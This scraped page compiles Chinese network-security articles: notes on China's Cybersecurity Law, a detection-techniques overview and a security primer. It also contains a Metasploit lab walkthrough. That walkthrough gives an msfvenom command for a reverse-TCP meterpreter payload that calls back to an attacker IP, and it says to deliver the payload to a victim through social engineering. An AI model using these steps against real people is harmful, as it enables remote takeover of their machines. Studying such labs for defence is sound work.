精华内容
下载资源
问答
  • 网络安全法学习整理笔记
    千次阅读
    2022-04-08 01:06:21

    网络安全法

    一、背景

    概念

    • 网络:是指由计算机或者其他信息终端及相关设备组成的按照一定的规则和程序对信息进行收集、存储、传输、交换、处理的系统。
    • 网络安全:是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。
    • 网络运营者:是指网络的所有者、管理者和网络服务提供者。
    • 网络数据:是指通过网络收集、存储、传输、处理和产生的各种电子数据。
    • 个人信息:是指以电子或者其他方式记录的能够单独或者与其他信息结合识别自然人个人身份的各种信息,包括但不限于自然人的姓名、出生日期、身份证件号码、个人生物识别信息、住址、电话号码等。
    • 关键信息基础设施:公共通信和信息服务、能源、交通、水利、金融、公共服务、电子政务等重要行业和领域,以及其他一旦遭到破坏、丧失功能或者数据泄露,可能严重危害国家安全、国计民生、公共利益的设施
    • 网络安全=运行安全+信息安全=(安全评估+产品服务+预警响应+人员)+(个人信息+出镜安全+有害处置)

    特点

    • 全面性:明确各个主体的义务与责任;确定了各方面的基本制度
    • 针对性:从国情出发,坚持问题导向,总结实践经验
    • 协调性:注重主体的权益,保障网络信息依法有序流通,促进技术创新。安全与发展并重

    目标

    • 保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展

    范围

    • 在中华人民共和国境内建设、运营、维护和使用网络,以及网络安全的监督管理

    原则

    • 主权原则:国家主权在网络空间中的延伸和体现

      • 管辖:依自己的法律管辖事物的权利
      • 独立:不被其他国家干预的权利
      • 防卫:保障网络正常运行,不因攻击而中断
      • 平等:国际治理方面平等参与
    • 网络安全与信息化发展并重原则

      • 没有网络安全就没有国家安全,没有信息化就没有现代化;安全是发展的前提,发展是安全的保障;相辅相成,同步推进
      • 发展人才、完善战略、境外监测处置、提高意识、网络治理、未成年环境
    • 共同治理原则

      • 国家网信部门:统筹协调

      • 国务院电信主管部门、公安部门和其他有关机关:依法在职责范围内负责

      • 县级以上地方人民政府有关部门:依规定确定

      • 网络运营者:守法、履行义务、接受监督

      • 服务提供者:保障网络安全、稳定运行、防范攻击、维护数据安全

      • 相关行业组织:自律、指定规范、指导会员、促进行业发展

      • 个人:举报危害网络安全的行为。相关部门保密、保护举报人合法权益

    • 责权一致原则

      • 保护个人、组织依法使用网络的权利,保障网络信息依法有序自由流动
      • 个人和组织使用网络应当遵守宪法法律,不得危害网络安全、利用网络实行违法行为、侵害他人权益
    • 对于境外适用情况:

      • 境外的风险和威胁:监测、防御、处置

      • 境外的违法信息:采取措施阻断传播

      • 境外危害我国关基的活动:追究法律责任

    二、支持与促进

    建立和完善网络安全标准体系。国务院标准化行政主管部门和国务院其他有关部门根据各自的职责,组织制定并适时修订有关网络安全管理以及网络产品、服务和运行安全的国家标准、行业标准。

    国家支持企业、研究机构、高等学校、网络相关行业组织参与网络安全国家标准、行业标准的制定

    统筹规划,加大投入,扶持重点网络安全技术产业和项目,支持网络安全技术的研究开发和应用,推广安全可信的网络产品和服务,保护网络技术知识产权,支持企业、研究机构和高等学校等参与国家网络安全技术创新项目。

    推进网络安全社会化服务体系建设,鼓励有关企业、机构开展网络安全认证、检测和风险评估等安全服务。

    开发网络数据安全保护和利用技术,促进公共数据资源开放,推动技术创新和经济社会发展。创新网络安全管理方式,运用网络新技术,提升网络安全保护水平。

    网络安全宣传教育,并指导、督促有关单位做好网络安全宣传教育工作。大众传播媒介应当有针对性地面向社会进行网络安全宣传教育。

    学校等教育培训机构开展网络安全相关教育与培训,采取多种方式培养网络安全人才,促进网络安全人才交流。

    三、六大亮点

    3.1 主权

    国家主权在网络空间中的延伸和体现

    • 管辖:依自己的法律管辖事物的权利
    • 独立:不被其他国家干预的权利
    • 防卫:保障网络正常运行,不因攻击而中断
    • 平等:国际治理方面平等参与

    3.2 网络产品和服务提供者的安全义务

    • 强制标准义务:不得设置恶意程序,符合国家强制性要求,关键、专用产品检测、合格后才可以提供
    • 告知补救义务:发现其网络产品、服务存在安全缺陷、漏洞等风险时,应当立即采取补救措施,按照规定及时告知用户并向有关主管部门报告。
    • 安全维护义务:网络产品、服务的提供者应当为其产品、服务持续提供安全维护;在规定或者当事人约定的期限内,不得终止提供安全维护。
    • 个人信息保护义务:网络产品、服务具有收集用户信息功能的,其提供者应当向用户明示并取得同意;涉及用户个人信息的,还应当遵守本法和有关法律、行政法规关于个人信息保护的规定。

    3.3 网络运营者义务

    • 等保制度:制定制度和规程,确认安全负责人+背调,防范措施,监测状态事件,数据分类备份加密,其他
    • 身份认证:要求用户提供真实身份信息。国家推动不同电子身份认证之间的互认。
    • 应急预案:制定应急预案,及时处置漏洞、病毒、攻击、侵入等安全风险;定期演练;发生事件时,启动预案,采取补救措施,并按规定向有关主管部门报告。
    • 协助机制:为公安机关、国家安全机关依法维护国家安全和侦查犯罪的活动提供技术支持和协助。
    • 协作机制:建立健全协作机制,提高安全保障能力,加强安全风险应对能力。

    3.4 个人信息保护规则

    • 收集:告知并同意、公开目的、最小化收集

    • 处理:不得泄露、篡改、销毁收集的个人信息

    • 保护:采取措施保障防止信息泄露、毁损、丢失;如发生,立即补救并按规定告知用户和部门

    • 举报:个人有权要求运营者删除、更正信息

    • 合法:不得非法获取或提供个人信息

    3.5 关键信息基础设施安全保护制度

    基础等保

    • 制定制度和规程,确定负责人,落实网络安全保护责任
    • 防范措施抵御病毒、攻击、侵入
    • 技术措施监测、记录网络运行状态,相关日志大于六个月
    • 数据分类、重要数据备份、加密

    关基

    • 设置专人专岗,相关人员背调
    • 定期教育、培训、考核
    • 重要系统和数据库容灾备份
    • 应急预案、定期演练

    3.6 关键信息基础设施重要数据跨境传输规则

    • 境内运营中收集和产生的信息数据存储与境内
    • 需向境外提供的,应按照网信部和国务院制定的办法进行安全评估
    • 境外对境内关基攻击、侵入、干扰、破坏造成严重后果的,追究法律责任,冻结资产、制裁

    四、九大制度

    4.1 等级保护制度

    网络运营者应当按照网络安全等级保护制度的要求,履行下列安全保护义务,保障网络免受干扰、破坏或者未经授权的访问,防止网络数据泄露或者被窃取、篡改:

    • 指定制度和规程,确定负责人,落实保护责任
    • 采取技术防范病毒、攻击、侵入等
    • 监测记录网络状态,日志不少于六个月
    • 数据分类、重要数据备份、加密

    4.2 网络产品和服务安全制度

    • 强制标准义务:符合相关国家标准的强制性要求。不得设置恶意程序;网络关键设备和网络安全专用产品应当按照相关国家标准的强制性要求,检验后才可销售
    • 告知补救业务:发现产品或服务存在安全缺陷、漏洞等风险时,应当立即采取补救措施,按照规定及时告知用户并向有关主管部门报告。
    • 安全维护义务:应当为产品、服务持续提供安全维护;在规定或约定的期限内,不得终止提供安全维护。
    • 个人信息保护:具有收集用户信息功能的,应当向用户明示并取得同意;涉及用户个人信息的,还应当遵守本法和有关法律、行政法规关于个人信息保护的规定。

    4.3 运行制度

    4.3.1 一般

    • 认证使用机制:网络关键设备和网络安全专用产品安全认证合格后,方可销售或者提供。网信部制定目录,并推动安全认证和安全检测结果互认,避免重复认证、检测。
    • 安全信息发布:开展网络安全认证、检测、风险评估等活动,按规定向社会发布系统漏洞、计算机病毒、网络攻击、网络侵入等网络安全信息。
    • 禁止危害行为:不得非法入侵、干扰、窃取;不得提供相关工具;不得技术支持,广告推广等
    • 信息使用规则:履行网络安全保护职责中获取的信息,只能用于维护网络安全的需要,不得用于其他用途。

    4.3.2 关基

    定义

    • 公共通信和信息服务、能源、交通、水利、金融、公共服务、电子政务等重要行业和领域,
    • 一旦遭到破坏、丧失功能或者数据泄露,可能严重危害国家安全、国计民生、公共利益

    特殊

    • 在网络安全等级保护制度的基础上,实行重点保护。关键信息基础设施的具体范围和安全保护办法由国务院制定。国家鼓励关键信息基础设施以外的网络运营者自愿参与关键信息基础设施保护体系。

    分工

    • 负责关基保护工作的各部门负责实施本行业、本领域的关基保护工作
    • 国家网信部门统筹协调有关部门
      • 抽查检测,提出改进措施,可以委托网络安全服务机构对进行检测评估
      • 定期应急演练,提高应对网络安全事件的水平和协同配合能力;
      • 促进部门、运营者以及研究机构、服务机构等之间的网络安全信息共享
      • 对网络安全事件的应急处置与网络功能的恢复等,提供技术支持和协助。

    原则

    • 具有支持业务稳定、持续运行的性能
    • 保证安全技术措施同步规划、同步建设、同步使用

    义务:除等保规定的义务外,还需

    • 人员安全管理:设置管理机构和负责人;安全背景审查;定期教育、培训和考核;

    • 数据境内留存:境内收集产生的境内存储;如需向境外提供需评估;对重要系统和数据库进行容灾备份;

      • 出境范围:50万人+、1000G+、7大领域
    • 应急预案机制:制定网络安全事件应急预案,并定期进行演练;

    • 安全采购措施:有关部门审查+提供者保密协议

      • 审查目标:提高网络安全产品和服务安全可控水平,防范网络安全风险,维护国家安全
      • 审查对象:关系国家安全的网络和信息系统采购的重要网络产品和服务
      • 审查方法:社会监督,实验室,现场,在线,背调,供应链
      • 审查结果:黑白名单
      • 审查内容:自身风险,被控制风险;关键部件生产测试交付技术支持供应链风险;非法收集数据风险;利用用户依赖损害用户利益风险;
    • 风险评估机制:每年检测评估并报送

    4.4 网络安全风险评估制度

    • 制定预案:建立网络安全风险评估和应急工作机制,制定网络安全事件应急预案,定期演练

    • 信息公开:按规定开展网络安全认证、检测、风险评估等活动,向社会发布漏洞、病毒、攻击、侵入等信息

    • 每年评估:对网络安全性和可能存在的风险每年评估一次,并将报告和改进措施报送相关部门

    • 分级标准:危害程度+影响范围

    4.6 网络安全事件应急预案制度

    • 发生前:

      • 制定应急预案,建立风险评估和应急工作机制。定期演练;
      • 及时处置,降低风险。漏洞、病毒、攻击、侵入等;
      • 安全事件分级:危害程度+影响范围。不同级别指定相应的应急措施
    • 可能发生时:

      • 各部门及时收集报告信息,加强风险检测
      • 对风险信息进行评估,分析可能性、危害程度、影响范围
      • 向社会发布风险预警,防范措施
    • 发生时:

      • 立即启动应急预案,调查+评估,采取措施消除安全隐患,及时公布警示信息
      • 可以参照《中华人民共和国突发事件应对法》、《中华人民共和国安全生产法》
      • 经国务院决定或者批准,可以在特定区域对网络通信采取限制等临时措施。

    4.7 网络安全监测和预警制度

    • 国家建立网络安全监测预警和信息通报制度。加强网络安全信息收集、分析和通报工作,按照规定统一发布网络安全监测预警信息。
    • 关键信息基础设施安全保护工作的部门建立健全本行业、本领域的网络安全监测预警和信息通报制度,并按照规定报送网络安全监测预警信息。
    • 省级以上人民政府有关部门在监管过程中,发现较大风险或发生安全事件,可以对该网络的运营者进行约谈。

    4.8 用户信息保护制度

    • 实名:办理部分业务时,网络运营者应要求用户提供真实身份信息。

    • 规则:合法、正当、必要的收集,告知并取得同意、公开目的、最小化收集;不得泄露、篡改、销毁收集的个人信息;个人有权要求运营者删除、更正信息;采取措施保障防止信息泄露、毁损、丢失;如发生,立即补救并按规定告知用户和部门;

    • 管理:对用户发布的信息管理,立即停止、消除、防扩散并报告;来源境外的采取措施阻断传播

    • 投诉:建立投诉制度,公开投诉方式,并处理收到的投诉和举报

    • 电诈:电子邮件不得设置恶意程序, 不得包含违法信息。采取措施消除并报告;不得设立违法网站、群组。不得利用网络诈骗、销售违法物品或信息;不得非法获取或向他人提供个人信息。

    • 配合:运营者配合网信和有关部门的依法监督检查

    构建网络安全体系

    五项举措

    一是推动完善网络安全法律法规和制度标准体系,同步完善危险监测处置、数据保护、新技术、新业务安全评估等行业配套政策;

    二是持续强化信息通信行业网络安全的防护能力部署和监督落实;

    三是加大网络环境的治理力度,每年不定期开展网络安全威胁的专项治理行动;

    四是推进信息行业大数据安全的监管能力建设;

    五是推动网络安全产业的发展和人才队伍建设,强化基础支撑的保障能力。

    在这里插入图片描述

    更多相关内容
  • Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,...

    一、背景介绍
    Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习!​

    二、资源装备
    1.安装好的Linux虚拟机一台
    2.整装待发的小白一个。
    3.安装好的Kali Linux虚拟机一台。

    三、安全演练
    3.1 将受害者主机(Windows7)跟控制者主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。
    步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。在这里插入图片描述
    3.2 查看实验的两台主机的IP地址,如下图所示。
    命令:ifconfig
    在这里插入图片描述
    在这里插入图片描述
    3.3 利用命令查看控制者主机跟受害者主机是否可以互相通信,如下图所示。
    命令:ping IP
    例子:ping 192.168.78.162在这里插入图片描述
    在这里插入图片描述
    3.4 利用“msfvenom”木码生成工具生成对应的木码文件,如下图所示。
    步骤1:msfvenom工具的参数介绍
    -p, –payload < payload> 指定需要使用的payload荷载。也可以使用自定义payload,几乎是支持全平台的
    -o, –out < path> 指定创建好的payload的存放位置。
    -h, –help 查看帮助选项。
    步骤2:利用msfvenom工具生成对应的木码文件,如下图所示。
    命令:msfvenom -p 指定需要使用的payload荷载 lhost=控制者主机IP -f exe > 生成木码文件的保存位置
    例子:msfVenom -p linux/meterpreter/reverse_tcp lhost=192.168.78.l69 -f elf > /root/hk.elf在这里插入图片描述
    步骤3:在已知的木码文件保存路径目录下查找对应的木码文件是否已经生成,如下图所示,木码文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的木码文件)。在这里插入图片描述
    3.5 利用一定的社会工程学方法将生成的木码文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解)在这里插入图片描述
    3.6 查看受害者主机是否已经存在对应的木码文件,如下图所示。
    命令:ls在这里插入图片描述
    3.7 查看postgresql数据库服务是否开启,如下图所示。
    命令:service postgresql status在这里插入图片描述
    3.8 开启postgresql数据库服务,如下图所示。
    命令:service postgresql start在这里插入图片描述
    3.9 初始化postgresql数据库,如下图所示。
    命令:msfdb init
    在这里插入图片描述
    ​​点我学习专业的Kali Linux安全技术​​

    展开全文
  • 网络安全检测技术

    千次阅读 2022-01-16 21:18:34
    一,网络安全漏洞 安全威胁是指所有能够对计算机网络信息系统的网络服务和网络信息的机密性,可用性和完整性产生阻碍,破坏或中断的各种因素。安全威胁可分为人为安全威胁和非人为安全威胁两大类。 1,网络安全...

    一,网络安全漏洞

    • 安全威胁是指所有能够对计算机网络信息系统的网络服务和网络信息的机密性,可用性和完整性产生阻碍,破坏或中断的各种因素。安全威胁可分为人为安全威胁非人为安全威胁两大类。

    1,网络安全漏洞威胁

    • 漏洞分析的目的是发现目标系统中存在的安全隐患,分析使用的安全机制是否能够保证系统的机密性,完整性和可用性。
    • 漏洞分析通过对评估目标进行穿透测试,进而尝试从中获取一些有价值的信息。
    • 穿透测试可分为两类:
      • 无先验知识穿透测试:通常从外部实施,测试者对被测试网络系统的拓扑结构等信息一无所知。
      • 有先验知识穿透测试:测试者通常具有被测试网络系统的基本访问权限,并可以了解网络系统拓扑结构等知识。
    • 对于安全漏洞,可以按照风险等级对其进行归类。
      在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

    2,网络安全漏洞的分类

    • 漏洞是在硬件,软件和协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。
    • 在进行系统安全性评估时,需要注意的是已发现的漏洞数量并不能完全反应系统的安全程度,与系统的使用范围,经受检验的程度,及是否开放源码等因素都有关系。
    • 漏洞的分类主要有按漏洞可能对系统造成的直接威胁分类按漏洞的成因分类两大类。

    1,按漏洞可能对系统造成的直接威胁分类

    漏洞类型漏洞描述典型漏洞
    远程管理员权限攻击者无须一个账号登录到本地,直接获得远程系统的管理员权限,通常通过攻击以root身份执行的有缺陷的系统守护进程来完成。漏洞的绝大部分来源于缓冲区溢出,少部分来自守护进程本身的逻辑缺陷。Windows NT IIS 4.0的ISAPI DLL对输入的URL未进行适当的边界检查,如果构造一个超长的URL,可以溢出IIS(inetinfo.exe)的缓冲区,执行攻击者指定的代码。由于inetinfo.exe是以local system身份启动,溢出后可以直接得到管理员权限。
    本地管理员权限攻击者在已有一个本地账号能够登录到系统的情况下,通过攻击本地某些有缺陷的suid程序和竞争条件等手段,得到系统的管理员权限。RedHat Linux的restore是个suid程序,它的执行依靠一个RSH环境变量,通过设置环境变量PATH,可以使RSH变量中的可执行程序以root身份运行,从而获得系统的root权限。
    普通用户访问权限攻击者利用服务器的漏洞,取得系统的普通用户存取权限,对UNIX类系统通常是shell访问权限,对Windows系统通常是cmd.exe的访问权限,能够以一般用户的身份执行程序,存取文件。攻击者通常攻击以非root身份运行的守护进程,及有缺陷的cgi程序等手段获得这种访问权限。Windows IIS 4.0~5.0存在Unicode解码漏洞,可以使攻击者利用cmd.exe以guest组的权限在系统上运行程序。相当于获得了普通用户的权限。
    权限提升攻击者在本地通过攻击某些有缺陷的sgid程序,可以把权限提升到某个非root用户的水平。获得管理员权限可以看成是一种特殊的权限提升,只是因为威胁的大小不同而独立出来。RedHat Linux 6.1带的man程序为sgid man,它存在format bug,通过对它的溢出攻击,可以使攻击者得到man组的用户权限。
    读取受限文件攻击者通过利用某些漏洞,读取系统中他应该没有权限的文件,这些文件通常是与安全相关的。这些漏洞的存在可能是我呢见设置权限不正确,或者是特权进程对文件的不正确处理和意外dump core使受限文件的一部分dump到了core文件中。SunOS 5.5的ftpd存在漏洞,一般用户可以引起ftpd出错,而dump出一个全局可读的core文件,里面有shadow文件的片段,从而使一般用户能读到shadow的部分内容。
    远程拒绝服务攻击者利用这类漏洞,无须登录即可对系统发起拒绝服务攻击,使系统或相关的应用程序崩溃或失去响应能力。这类漏洞通常是系统本身或其守护进程有缺陷或设置不正确造成的。早期的Linux和BSD的tcp/ip堆栈的IP片段重组模块存在缺陷,攻击者通过向系统发出特殊的IP片段包可以使计算机崩溃。
    本地拒绝服务在攻击者登录到系统后,利用这类漏洞,可以使系统本身或应用程序崩溃。这种漏洞主要因为是程序对意外情况的处理失误,如写临时文件之前不检查文件是否存在,盲目跟随链接等。RedHat 6.1的tmpwatch程序存在缺陷,可以是系统fork()出许多进程,从而使系统失去响应能力。
    远程非授权文件存取利用这类漏洞,攻击者可以不经授权地从远程存取程序的某些文件。这类漏洞主要是由一些由缺陷的cgi程序引起的,它们对用户输入没有进行适当的合法性检查,使攻击者通过构造特别的输入,获得对文件的存取。Windows IIS 5.0存在一个漏洞,通过向它发送一个特殊的head标记,可以得到ASP源码,而不是经过解释执行ASP页面。
    口令恢复因为采用了较弱的口令加密方式,使攻击者可以很容易地分析出口令的加密方法,从而使攻击者通过某种方法得到密码后还原出明文来。Pcanywhere 9.0采用非常脆弱的加密方法来加密传输中的口令,只要窃听了传输中的数据很容易解码出明文口令。
    欺骗利用这些漏洞,攻击者可以对目标系统实施某种形式的欺骗,这通常是由于系统的实现上存在某些漏洞。Linux kernel 2.0.35以下的tcp/ip堆栈存在漏洞,可以使攻击者非常容易实现IP地址欺骗。
    服务器信息泄露利用这类漏洞,攻击者可以收集到对于进一步攻击系统有用的信息。这类漏洞的产生主要是因为系统程序有缺陷,一般是对错误输入的不正确处理。Windows IIS 3.0~5.0存在漏洞,当向系统请求不存在的.idq文件时,计算机可能会返回出错信息,里面暴露了IIS的安装目录信息。
    其他漏洞上面没有介绍的

    2,按漏洞的成因分类

    漏洞类型漏洞描述
    输入验证错误大多数的缓冲区溢出漏洞和CGI类漏洞都是由于未对用户提供的输入数据的合法性进行适当的检查。
    访问验证错误漏洞的产生是由于程序的访问验证部分存在某些可利用的逻辑错误,使绕过这种访问控制成为可能。
    竞争条件漏洞的产生在于程序处理文件等实体时在时许和同步方面存在问题,从而在处理过程中可能存在一些机会窗口使攻击者能够施加外来的影响。
    意外情况处置错误漏洞的产生在于程序在其实现逻辑中没有考虑到一些意外情况。
    设计错误严格来说,大多数的漏洞都是由于设计错误造成的,此处主要归类暂时无法放入到其他类别的漏洞。
    配置错误漏洞的产生在于系统和应用的配置有误,或是软件安装在错误的地方,或是错误的配置参数,或是错误的访问权限,策略错误等。
    环境错误环境错误主要是指程序在不适当的系统环境下执行而造成的问题。

    二,网络安全漏洞检测技术

    • 主要包括端口扫描,操作系统探测和安全漏洞探测。

    1,端口扫描技术

    1,端口扫描原理

    • 向目标主机的TCP/IP端口发送探测数据包,并记录目标主机的响应。通过分析响应来判断端口是打开还是关闭等状态信息。

    2,TCP端口扫描技术

    • TCP端口扫描技术主要有全连接扫描技术,半连接(SYN)扫描技术,间接扫描技术和秘密扫描技术等。

    1,全连接扫描技术

    • 全连接扫描是TCP端口扫描的基础,现有的全连接扫描主要是TCP connect()扫描。
    • 工作方式为对目标主机上感兴趣的端口进行connect()连接试探,如果该端口被监听,则连接成功,否则表示该端口未开放或无法到达。
    • 优点:用户无须特殊权限,且探测结果最为准确。
    • 缺点:容易被目标主机察觉并记录下来。

    2,半连接(SYN)端口扫描技术

    • 半连接(SYN)端口扫描也称为“半开”式的扫描,它不建立完整的TCP连接,而是只发送一个SYN信息包。
    • 一个SYN|ACK的响应包表示目标端口是开放监听的,而一个RST(复位)的响应包则表示目标端口未被监听。若收到SYN|ACK应答包,系统将随即发送一个RST包来中断此连接。
    • 优点:即使日志中对扫描有所记录,但是尝试进行连接的记录也要比全连接扫描少得多。
    • 缺点:大部分操作系统下,发送主机需要构造适用于这种扫描的IP包。

    3,UDP端口扫描技术

    • 用来确定在目标主机上有哪些UDP端口是开放的。
    • 工作原理是发送0字节的UDP信息包到目标计算机的各个端口,若收到一个ICMP端口不可达的回应,则表示该UDP端口是关闭的,否则该端口就是开放的。

    2,操作系统探测技术

    • 操作系统探测技术主要包括:获取标识信息探测技术,基于TCP/IP协议栈的操作系统指纹探测技术和ICMP响应分析探测技术。

    1,获取标识信息探测技术

    • 获取标识信息探测技术主要是指借助操作系统本身提供的命令和程序进行操作系统类型探测的技术,例如使用telnet命令可以得到主机操作系统的类型。

    2,基于TCP/IP协议栈的操作系统指纹探测技术

    • 操作系统指纹是指能够通过网络连接获取的唯一标识某一操作系统的类型及其版本号的一组特征信息。
    • 操作系统指纹探测步骤如下:
      1. 形成一个涵盖大部分常用操作系统的较为详细全面的操作系统指纹特征库。
      2. 向目标发送多种特意构造的信息包,检测其是否响应这些信息包,以及是如何响应这些信息包的。
      3. 把从特定目标返回的特征信息与指纹特征库进行匹配,从而判断出目标计算机的操作系统类型及其版本号信息。

    3,ICMP响应分析探测技术

    • 该技术通过发送UDP或ICMP的请求报文,然后分析各种ICMP应答信息来判断操作系统的类型及其版本信息。
    • 本质上也是一种基于TCP/IP协议栈的操作系统指纹探测技术。

    3,安全漏洞探测技术

    • 漏洞探测技术可以分为信息型漏洞探测和攻击型漏洞探测两种。按照漏洞探测的技术特征,又可以划分为基于应用的探测技术,基于主机的探测技术,基于目标的探测技术和基于网络的探测技术等。

    1,信息型漏洞探测

    • 顺序扫描技术:可以将收集到的漏洞和信息用于另一个扫描过程以进行更深层次的扫描——即以并行方式收集漏洞信息,然后在多个组件之间共享这些信息。此扫描方式可以实现边扫描边学习的扫描过程,可进行更为彻底的探测,更为深入地发现网络中的漏洞,。
    • 多重服务检测技术:即不按照RFC所指定的端口号来区分目标主机所运行的服务,而是按照服务本身的真实响应来识别服务类型。

    2,攻击型漏洞探测

    • 模拟攻击是最直接的漏洞探测技术,其探测结果的准确率也是最高的。该探测技术的主要思想是模拟网络入侵的一般过程,对目标系统进行无恶意攻击尝试,若攻击成功则表明相应的安全漏洞必然存在。
    • 模拟攻击主要通过专用攻击脚本语言,通用程序设计语言和成形的攻击工具来进行。

    3,漏洞探测技术特征分类

    1,基于应用的检测技术

    • 采用被动的,非破坏性的方法检查应用软件包的设置,发现安全漏洞。

    2,基于主机的检测技术

    • 采用被动的,非破坏性的方法对系统进行检测。通常,它涉及到系统的内核,文件的属性和操作系统的补丁等问题。
    • 此方式可非常准确地定位系统的问题,发现系统的漏洞。
    • 缺点:与平台相关,升级复杂。

    3,基于目标的漏洞检测技术

    • 采用被动的,非破坏性的方法检查系统属性和文件属性,如数据库,注册号等。
    • 这种技术的实现是运行在一个闭环上,不断地处理文件,系统目标及系统目标属性,然后产生检验数,把这些检验数同原来地检验数相比较,一旦发现改变就通知管理员。

    4,基于网络的检测技术

    • 采用积极的,非破坏性的方法来检验系统是否有可能被攻击崩溃。
    • 利用一系列的脚本模拟对系统进行攻击的行为,然后对结果进行分析。还针对已知的网络漏洞进行检验。
    • 此技术可以发现一系列平台的漏洞,容易安装,但是可能会影响网络性能。
    展开全文
  • 网络安全基础介绍

    千次阅读 2022-04-12 16:10:16
    二、什么是网络安全 1.定义 2.实现 3.网络安全的三个基本属性 三、面临的威胁和来源 1.互联网因素 在互联网的大背景下网络数据和基础架构面临的常见威胁包括黑客攻击、恶意软件和病毒,这些威胁都有可能企图...

    目录

    文章目录

    前言

    一、网络攻击其实一直在我们身边

    1.恶意程序:

     2.计算机恶意程序用户感染情况

    二、什么是网络安全

    1.定义

    2.实现

    3.网络安全的三个基本属性

    三、面临的威胁和来源

    1.互联网因素

    在互联网的大背景下网络数据和基础架构面临的常见威胁包括黑客攻击、恶意软件和病毒,这些威胁都有可能企图访问、修改和破坏网络。

    2.环境因素、意外事故或故障

    3.无恶意内部人员

    4.恶意内部人员

    四、攻击入侵方式

    1.黑客常见的攻击手段

    2.DDOS攻击(分布式拒绝服务攻击)

    3.缓冲区溢出攻击

    4.端口扫描攻击

    5.木马攻击

    6.病毒传播

    五、如何防护

    1.信息策略:

    如识别敏感信息、信息分类、敏感信息标记/存储/传输/销毁;

    总结


    前言

    随着互联网技术的不断发展,网络安全方面各行各业也越来越重视,网络攻击手段也越来越多样化如何防护、识别?本文就介绍了网络安全的基础内容。


    一、网络攻击其实一直在我们身边

    根据CNCERT/CC(国家计算机网络应急技术处理协调中心)统计CNCERT/CC(国家计算机网络应急技术处理协调中心)统计,2021 年上半年我国互联网安全概况如下:

    1.恶意程序:

    2021 年上半年,捕获恶意程序样本数量约 2,307 万个,
    日均传播次数达 582 万余次,涉及恶意程序家族约 20.8 万个。
    按照传播来源统计,境外来源主要来自美国、印度和日本等,
    具体分布如图

     2.计算机恶意程序用户感染情况

    我国境内感染计算机恶意程序的主机数量约 446 万台,同
    比增长 46.8%。位于境外的约 4.9 万个计算机恶意程序控制
    服务器控制我国境内约 410 万台主机。

    二、什么是网络安全

    1.定义

    网络安全是保护计算机、服务器、移动设备、电子系统、网络和数据免受恶意攻击的做法

    2.实现

    网络安全机制是一组策略、流程、访问控制和软硬件技术

    3.网络安全的三个基本属性

    • 机密性、主要是指控制信息的流出,即保证信息与信息不被非授权者所获取与使用

    • 完整性、是指信息的可靠性,即信息不会被伪造、篡改

    • 可用性、是保证系统可以正常使用。

    三、面临的威胁和来源

    1.互联网因素

    在互联网的大背景下网络数据和基础架构面临的常见威胁包括黑客攻击、恶意软件和病毒,这些威胁都有可能企图访问、修改和破坏网络。

    2.环境因素、意外事故或故障

    由于断电、静电、灰尘、潮湿、温度、鼠蚁虫害、电磁干扰、洪灾、火灾、地震等环境条件和自然灾害;意外事故或由于软件、硬件、数据、通讯线路方面的故障。

    3.无恶意内部人员

      由于缺乏责任心,或者由于不关心和不专注,或者没有遵循规章制度和操作流程而导致计算机系统威胁的内部人员;由于缺乏培训,专业技能不足,不具备岗位技能要求而导致计算机系统威胁的内部人员。

    4.恶意内部人员

      不满的或有预谋的内部人员对计算机系统进行恶意破坏;采用自主的或内外勾结的方式盗窃机密信息或进行篡改,获取利益。

    四、攻击入侵方式

    1.黑客常见的攻击手段

    2.DDOS攻击(分布式拒绝服务攻击)

    DOS/DDOS故意地攻击网络协议实现的缺陷或直接通过野蛮手段耗尽被攻击对象的资源,使服务系统停止响应甚至崩溃

    3.缓冲区溢出攻击

    缓冲区溢出攻击是利用缓冲区溢出漏洞,取得系统特权,所进行的攻击行动。缓冲区溢出会导致程序崩溃、系统关机、重新启动等问题。

    4.端口扫描攻击

    端口扫描攻击是一种常用的探测技术,攻击者向目标计算机发送一组端口扫描消息,探寻弱点,试图以此进行入侵。

    5.木马攻击

    木马是一段具有特殊功能的恶意代码,通过寻找计算机后门,隐藏在正常程序中。攻击者通过木马远程控制计算机的程序,对目标计算机实施监控、破坏和删除文件、发送密码、记录键盘和DOS攻击。

    6.病毒传播

    病毒是攻击者利用目标计算机软件和硬件固有的脆弱性编制一组指令集或程序代码,潜伏在存储介质(或程序)里,当被激活时,感染其他程序,对计算机破坏

    暴力破解,session欺骗技术,嗅探技术(Sniffer),隧道技术,端口复用技术,木马特征字修改技术日志清除技术Rootkit技术等这里不在一一介绍,有兴趣的可以自己看看

    五、如何防护

    1.信息策略:

    如识别敏感信息、信息分类、敏感信息标记/存储/传输/销毁;

    2.系统和网络安全策略:

    用户身份识别与身份鉴别、访问控制、审计、网络连接、加密等;

    3.系统管理程序:

    软件更新、漏洞扫描、策略检查、登录检查、常规监控等;

    4.防火墙技术

    防火墙能够隔离风险区域与安全区域的连接,同时不会妨碍安全区域对风险区域的访问

    5.人的安全意识

    大多数的安全漏洞和攻击都是因为安全意识不足导致的,在社会工程学中,人的主导行为会暴露出很多看是不重要,但其实风险很高。大家有兴趣可以去看下《我是谁:没有绝对的安全系统》这部电影,所以加强自身的安全意识会提高安全防护手段


     

    总结

    人是安全防护体系中最薄弱的环节

    加强员工安全教育、提高网络安全意识

    进攻与防御是对立统一的矛盾体

